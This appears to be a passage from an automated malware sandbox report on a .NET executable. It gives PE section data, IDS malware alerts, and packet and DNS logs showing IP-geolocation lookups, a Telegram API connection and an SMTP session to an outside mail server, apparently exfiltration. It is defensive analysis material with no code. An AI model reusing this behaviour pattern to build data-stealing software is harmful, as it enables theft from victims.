                                                                              .text0x20000xbb1d80xbb2005094a3c6267c9f5b62ae3c445402c28dFalse0.8930817363894455data7.746536493454694IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0xbe0000x63c0x800b08b6e10692e55e6b06363d69f7c0f72False0.33935546875data3.494372142259968IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0xc00000xc0x2005e8896b904698a63138a8bd1cc321187False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_VERSION0xbe0900x3acdata0.4148936170212766
                                                                              RT_MANIFEST0xbe44c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-10-01T10:55:00.305766+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549707193.122.6.16880TCP
                                                                              2024-10-01T10:55:04.199520+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549707193.122.6.16880TCP
                                                                              2024-10-01T10:55:04.725323+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549711188.114.97.3443TCP
                                                                              2024-10-01T10:55:16.227656+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549713193.122.6.16880TCP
                                                                              2024-10-01T10:55:24.758931+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549722193.122.6.16880TCP
                                                                              2024-10-01T10:55:33.647819+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549736188.114.97.3443TCP
                                                                              2024-10-01T10:55:36.431164+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549743188.114.97.3443TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 1, 2024 10:54:59.377123117 CEST4970780192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:54:59.382128954 CEST8049707193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:54:59.382208109 CEST4970780192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:54:59.382452011 CEST4970780192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:54:59.387185097 CEST8049707193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:00.042814970 CEST8049707193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:00.069933891 CEST4970780192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:00.075320005 CEST8049707193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:00.255995035 CEST8049707193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:00.305766106 CEST4970780192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:00.358153105 CEST49708443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:00.358182907 CEST44349708188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:00.358238935 CEST49708443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:00.366811037 CEST49708443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:00.366837978 CEST44349708188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:00.833781004 CEST44349708188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:00.833909988 CEST49708443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:00.877989054 CEST49708443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:00.878046036 CEST44349708188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:00.878464937 CEST44349708188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:00.930838108 CEST49708443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:01.444878101 CEST49708443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:01.491419077 CEST44349708188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:01.975202084 CEST44349708188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:01.975296974 CEST44349708188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:01.975496054 CEST49708443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:02.030278921 CEST49708443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:02.033912897 CEST4970780192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:02.038824081 CEST8049707193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:04.006131887 CEST8049707193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:04.099447012 CEST49711443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:04.099546909 CEST44349711188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:04.099668026 CEST49711443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:04.100610018 CEST49711443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:04.100646019 CEST44349711188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:04.199520111 CEST4970780192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:04.573545933 CEST44349711188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:04.586319923 CEST49711443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:04.586396933 CEST44349711188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:04.643974066 CEST4971280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:04.649193048 CEST8049712193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:04.649324894 CEST4971280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:04.653181076 CEST4971280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:04.658082008 CEST8049712193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:04.725339890 CEST44349711188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:04.725440979 CEST44349711188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:04.725574970 CEST49711443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:04.726414919 CEST49711443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:04.735552073 CEST4970780192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:04.736669064 CEST4971380192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:04.740701914 CEST8049707193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:04.740781069 CEST4970780192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:04.741544008 CEST8049713193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:04.741624117 CEST4971380192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:04.741929054 CEST4971380192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:04.747422934 CEST8049713193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:16.176819086 CEST8049713193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:16.178464890 CEST49721443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:16.178580999 CEST44349721188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:16.178659916 CEST49721443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:16.178989887 CEST49721443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:16.179025888 CEST44349721188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:16.227655888 CEST4971380192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:16.638540983 CEST44349721188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:16.648904085 CEST49721443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:16.648982048 CEST44349721188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:16.786484957 CEST44349721188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:16.786585093 CEST44349721188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:16.786664963 CEST49721443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:16.787543058 CEST49721443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:16.791218042 CEST4971380192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:16.792844057 CEST4972280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:16.796996117 CEST8049713193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:16.797084093 CEST4971380192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:16.797612906 CEST8049722193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:16.797801018 CEST4972280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:16.797909021 CEST4972280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:16.802591085 CEST8049722193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:19.270039082 CEST8049712193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:19.321475029 CEST4971280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:24.710340023 CEST8049722193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:24.719551086 CEST4972680192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:24.724574089 CEST8049726193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:24.724703074 CEST4972680192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:24.724757910 CEST4972680192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:24.729629040 CEST8049726193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:24.758930922 CEST4972280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:28.482067108 CEST8049726193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:28.490905046 CEST49728443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:28.490957975 CEST44349728188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:28.491075039 CEST49728443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:28.491786957 CEST49728443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:28.491803885 CEST44349728188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:28.524557114 CEST4972680192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:28.954590082 CEST44349728188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:28.956828117 CEST49728443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:28.956859112 CEST44349728188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:29.086847067 CEST44349728188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:29.087455988 CEST44349728188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:29.087527990 CEST49728443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:29.087888956 CEST49728443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:29.096961975 CEST4972680192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:29.097619057 CEST4973080192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:29.102153063 CEST8049726193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:29.102217913 CEST4972680192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:29.102375031 CEST8049730193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:29.102451086 CEST4973080192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:29.102566004 CEST4973080192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:29.107476950 CEST8049730193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:31.730093002 CEST8049730193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:31.731801033 CEST49734443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:31.731836081 CEST44349734188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:31.731915951 CEST49734443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:31.732192993 CEST49734443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:31.732206106 CEST44349734188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:31.774622917 CEST4973080192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:32.205549955 CEST44349734188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:32.215790987 CEST49734443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:32.215821028 CEST44349734188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:32.355365992 CEST44349734188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:32.355596066 CEST44349734188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:32.355671883 CEST49734443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:32.392700911 CEST49734443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:32.399878025 CEST4973080192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:32.401034117 CEST4973580192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:32.404994965 CEST8049730193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:32.405051947 CEST4973080192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:32.405863047 CEST8049735193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:32.405927896 CEST4973580192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:32.409847975 CEST4973580192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:32.414658070 CEST8049735193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:33.043318987 CEST8049735193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:33.044899940 CEST49736443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:33.044929028 CEST44349736188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:33.045037031 CEST49736443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:33.045264006 CEST49736443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:33.045278072 CEST44349736188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:33.087685108 CEST4973580192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:33.501395941 CEST44349736188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:33.503220081 CEST49736443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:33.503271103 CEST44349736188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:33.647840023 CEST44349736188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:33.647937059 CEST44349736188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:33.648056984 CEST49736443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:33.648495913 CEST49736443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:33.652781010 CEST4973580192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:33.653779984 CEST4973880192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:33.657982111 CEST8049735193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:33.658052921 CEST4973580192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:33.658629894 CEST8049738193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:33.658693075 CEST4973880192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:33.658849001 CEST4973880192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:33.663614988 CEST8049738193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:34.303560972 CEST8049738193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:34.304929972 CEST49739443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:34.304982901 CEST44349739188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:34.305052996 CEST49739443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:34.305313110 CEST49739443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:34.305330992 CEST44349739188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:34.352679968 CEST4973880192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:34.764231920 CEST44349739188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:34.765692949 CEST49739443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:34.765727043 CEST44349739188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:34.896761894 CEST44349739188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:34.896871090 CEST44349739188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:34.896924019 CEST49739443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:34.898972034 CEST49739443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:35.169591904 CEST4973880192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:35.171077013 CEST4974280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:35.176040888 CEST8049738193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:35.176063061 CEST8049742193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:35.176109076 CEST4973880192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:35.176142931 CEST4974280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:35.178710938 CEST4974280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:35.184899092 CEST8049742193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:35.806416035 CEST8049742193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:35.807504892 CEST49743443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:35.807538986 CEST44349743188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:35.807677031 CEST49743443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:35.807909966 CEST49743443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:35.807919979 CEST44349743188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:35.851099968 CEST4971280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:35.852660894 CEST4974280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:36.292131901 CEST44349743188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:36.293837070 CEST49743443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:36.293860912 CEST44349743188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:36.431179047 CEST44349743188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:36.431271076 CEST44349743188.114.97.3192.168.2.5
                                                                              Oct 1, 2024 10:55:36.431482077 CEST49743443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:36.432276011 CEST49743443192.168.2.5188.114.97.3
                                                                              Oct 1, 2024 10:55:36.443624973 CEST4974280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:36.448683023 CEST8049742193.122.6.168192.168.2.5
                                                                              Oct 1, 2024 10:55:36.448820114 CEST4974280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:36.452663898 CEST49744443192.168.2.5149.154.167.220
                                                                              Oct 1, 2024 10:55:36.452692032 CEST44349744149.154.167.220192.168.2.5
                                                                              Oct 1, 2024 10:55:36.453011036 CEST49744443192.168.2.5149.154.167.220
                                                                              Oct 1, 2024 10:55:36.453433037 CEST49744443192.168.2.5149.154.167.220
                                                                              Oct 1, 2024 10:55:36.453445911 CEST44349744149.154.167.220192.168.2.5
                                                                              Oct 1, 2024 10:55:37.072583914 CEST44349744149.154.167.220192.168.2.5
                                                                              Oct 1, 2024 10:55:37.072784901 CEST49744443192.168.2.5149.154.167.220
                                                                              Oct 1, 2024 10:55:37.075287104 CEST49744443192.168.2.5149.154.167.220
                                                                              Oct 1, 2024 10:55:37.075294971 CEST44349744149.154.167.220192.168.2.5
                                                                              Oct 1, 2024 10:55:37.075545073 CEST44349744149.154.167.220192.168.2.5
                                                                              Oct 1, 2024 10:55:37.081155062 CEST49744443192.168.2.5149.154.167.220
                                                                              Oct 1, 2024 10:55:37.123410940 CEST44349744149.154.167.220192.168.2.5
                                                                              Oct 1, 2024 10:55:37.314937115 CEST44349744149.154.167.220192.168.2.5
                                                                              Oct 1, 2024 10:55:37.315016985 CEST44349744149.154.167.220192.168.2.5
                                                                              Oct 1, 2024 10:55:37.315099001 CEST49744443192.168.2.5149.154.167.220
                                                                              Oct 1, 2024 10:55:37.315570116 CEST49744443192.168.2.5149.154.167.220
                                                                              Oct 1, 2024 10:55:42.551069975 CEST4972280192.168.2.5193.122.6.168
                                                                              Oct 1, 2024 10:55:42.749882936 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:42.754782915 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:42.754895926 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:43.713464975 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:43.713819027 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:43.718833923 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:43.886593103 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:43.886831999 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:43.891765118 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:44.060343027 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:44.060802937 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:44.065609932 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:44.255949020 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:44.255976915 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:44.255986929 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:44.256041050 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:44.343219995 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:44.359153986 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:44.363945007 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:44.531580925 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:44.534852982 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:44.539622068 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:44.707087040 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:44.708296061 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:44.713181973 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:44.880956888 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:44.881345034 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:44.886199951 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:45.065654039 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:45.065944910 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:45.070739985 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:45.238300085 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:45.238626957 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:45.243407011 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:45.419131994 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:45.419400930 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:45.424278021 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:45.591739893 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:45.592520952 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:45.592588902 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:45.592664003 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:45.592726946 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:55:45.597317934 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:45.597378016 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:45.597557068 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:45.597599030 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:46.493738890 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:55:46.540162086 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:57:22.745493889 CEST49745587192.168.2.575.102.58.14
                                                                              Oct 1, 2024 10:57:22.750541925 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:57:22.918318987 CEST5874974575.102.58.14192.168.2.5
                                                                              Oct 1, 2024 10:57:22.919169903 CEST49745587192.168.2.575.102.58.14
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 1, 2024 10:54:59.317343950 CEST6063353192.168.2.51.1.1.1
                                                                              Oct 1, 2024 10:54:59.324086905 CEST53606331.1.1.1192.168.2.5
                                                                              Oct 1, 2024 10:55:00.346477985 CEST5694253192.168.2.51.1.1.1
                                                                              Oct 1, 2024 10:55:00.354070902 CEST53569421.1.1.1192.168.2.5
                                                                              Oct 1, 2024 10:55:36.444272995 CEST5741353192.168.2.51.1.1.1
                                                                              Oct 1, 2024 10:55:36.452115059 CEST53574131.1.1.1192.168.2.5
                                                                              Oct 1, 2024 10:55:42.719172955 CEST5035753192.168.2.51.1.1.1
                                                                              Oct 1, 2024 10:55:42.748959064 CEST53503571.1.1.1192.168.2.5
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Oct 1, 2024 10:54:59.317343950 CEST192.168.2.51.1.1.10x98bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                              Oct 1, 2024 10:55:00.346477985 CEST192.168.2.51.1.1.10x1345Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                              Oct 1, 2024 10:55:36.444272995 CEST192.168.2.51.1.1.10x5b8dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                              Oct 1, 2024 10:55:42.719172955 CEST192.168.2.51.1.1.10x3238Standard query (0)mail.pymetal.netA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Oct 1, 2024 10:54:59.324086905 CEST1.1.1.1192.168.2.50x98bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 1, 2024 10:54:59.324086905 CEST1.1.1.1192.168.2.50x98bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                              Oct 1, 2024 10:54:59.324086905 CEST1.1.1.1192.168.2.50x98bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                              Oct 1, 2024 10:54:59.324086905 CEST1.1.1.1192.168.2.50x98bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                              Oct 1, 2024 10:54:59.324086905 CEST1.1.1.1192.168.2.50x98bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                              Oct 1, 2024 10:54:59.324086905 CEST1.1.1.1192.168.2.50x98bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                              Oct 1, 2024 10:55:00.354070902 CEST1.1.1.1192.168.2.50x1345No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                              Oct 1, 2024 10:55:00.354070902 CEST1.1.1.1192.168.2.50x1345No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                              Oct 1, 2024 10:55:36.452115059 CEST1.1.1.1192.168.2.50x5b8dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                              Oct 1, 2024 10:55:42.748959064 CEST1.1.1.1192.168.2.50x3238No error (0)mail.pymetal.net75.102.58.14A (IP address)IN (0x0001)false
                                                                              • reallyfreegeoip.org
                                                                              • api.telegram.org
                                                                              • checkip.dyndns.org
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549707193.122.6.168807308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 1, 2024 10:54:59.382452011 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
